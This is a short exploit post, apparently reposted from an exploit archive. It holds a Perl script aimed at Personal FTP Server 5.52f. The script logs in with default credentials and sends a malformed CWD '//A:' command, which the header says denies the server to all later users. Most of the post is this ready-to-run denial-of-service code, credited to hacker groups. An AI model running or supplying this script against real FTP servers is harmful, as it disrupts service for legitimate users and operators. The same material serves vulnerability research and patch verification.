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Personal FTP Server 5.52f Exploit
来源:S8T@hotmail.com 作者:TA4G 发布时间:2010-08-02  
# Exploit Title: Personal FTP Server 5.52f bug
# Date: 01/08/2010
# Author: TA4G - S8T@hotmail.com
# Download: Personal FTP-Server PRO [deutsch] v5.52 Limitierte Shareware Version
# Download: http://www.michael-roth-software.de/prosharegerman.zip
# It's rather a bug then a DoS which consist in denying other users access to the ftp server, after a previous user triggered a //A: command
# Version: 5.52
# Google dork : n/a
# Platform / Tested on:  windows 7
# Category: webapps/0day
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#  L0v3 To: TA4G _ lOsT _ Mr-DraGon _ Kader11000 _ illusionist2512 _ TnTDc _ P4L-T3RRORIST _ Sn!p3r_P4L
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#                                          Gr33tz to ### ArHack.NeT ###
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

use Net::FTP;

(($target = $ARGV[0])) || die &quot;usage:$0 <target> <port>&quot;;

my $user = &quot;test&quot;;
my $pass = &quot;test&quot;;
$expl = &quot;//A:&quot;;

$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die &quot;Nu m-am putut conecta: $!&quot;;
$ftp->login($user,$pass) || die &quot;Nu m-am putut loga: $!&quot;;
print &quot;M-am logat!n&quot;;

$ftp->command(&quot;CWD&quot;, $expl);
print &quot;Lansez comanda in executie...n&quot;;

print &quot;Incerc sa ma conectez din nou..n&quot;;

$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die &quot;Userul 2 nu se mai poate conecta: $!&quot;;


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